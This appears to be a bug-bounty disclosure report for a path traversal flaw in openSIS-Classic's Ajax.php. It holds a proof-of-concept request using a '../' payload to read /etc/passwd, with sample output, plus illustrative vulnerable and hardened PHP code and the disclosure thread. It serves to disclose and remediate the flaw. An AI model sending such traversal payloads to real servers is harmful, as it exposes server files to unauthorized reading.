Path Traversal in os4ed/opensis-classic

Valid

Reported on

Aug 27th 2021


✍️ Description

The modname parameter of Ajax.php is vulnerable to path traversal, allowing read access to arbitrary files on the server.

🕵️‍♂️ Proof of Concept

// Ajax.php
GET /Ajax.php?modname=../../../../../../../../../../../../../../../../etc/passwd

HTTP/1.1 302 Found
Location: index.php

[application HTML and JavaScript omitted from the response body; the contents of the included file appear inline after the page markup]
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

💥 Impact

Enables an attacker to access sensitive files

📍 Location

Ajax.php#L107-L287
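The pattern behind this class of bug and one way to close it, as an added illustration that is not openSIS-Classic's own code: a hypothetical Ajax.php-style dispatcher that includes whatever file modname names, beside a hardened version that allowlists the name format and confirms the resolved path stays inside the modules directory. The modules/ layout and the <dir>/<File>.php naming are assumptions.

```php
<?php
// Added illustration, not code from openSIS-Classic. A hypothetical
// Ajax.php-style dispatcher that includes a module chosen by the
// "modname" request parameter, followed by a hardened replacement.

// Vulnerable pattern: the parameter becomes the include path as-is,
// so "../../../../etc/passwd" walks out of the modules directory.
function include_module_unsafe(string $modname): void
{
    include 'modules/' . $modname;   // DO NOT USE: path traversal
}

// Hardened: accept only names of the assumed form <dir>/<File>.php built
// from [A-Za-z0-9_], then confirm the resolved path stays under modules/.
function resolve_module(string $modname, string $modulesDir): ?string
{
    // Syntactic allowlist rejects "..", leading "/", "%", null bytes, etc.
    if (!preg_match('#^[A-Za-z0-9_]+/[A-Za-z0-9_]+\.php$#', $modname)) {
        return null;
    }
    $base = realpath($modulesDir);
    $path = realpath($modulesDir . '/' . $modname);
    // realpath() returns false for a missing file; the prefix check also
    // defends against a symlink inside modules/ pointing elsewhere.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_module_safe(string $modname): void
{
    $path = resolve_module($modname, __DIR__ . '/modules');
    if ($path === null) {
        http_response_code(400);   // refuse instead of redirecting after output
        exit('invalid module');
    }
    require $path;
}

// Demonstration with the report's payload and a well-formed (constructed) name.
$modules = sys_get_temp_dir() . '/modules_demo';
@mkdir("$modules/users", 0700, true);
file_put_contents("$modules/users/Student.php", "<?php // constructed demo module\n");
var_dump(resolve_module('../../../../../../../../etc/passwd', $modules));
var_dump(resolve_module('users/Student.php', $modules) !== null);
```

The first var_dump is NULL because the regex rejects the traversal before any filesystem lookup; the second is true because the constructed module resolves under the modules directory.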

N modified the report
a year ago
Z-Old
a year ago

Admin


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back a year ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. a year ago
N
2 months ago

Researcher


@admin Good Day - This was fixed under https://github.com/OS4ED/openSIS-Classic/commit/a2d617977fa159185263845ac75b8c83cddd07f0 -- Would you please be able to manually validate? Thank you

Pavlos
2 months ago

Admin


Hey N! I just sent them an email to confirm the above because the severity, vulnerability type and public disclosure still need to be confirmed by the maintainer

Pavlos validated this vulnerability a month ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.1 with commit a2d617 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ajax.php#L107-L287 has been validated
Pavlos published this vulnerability a month ago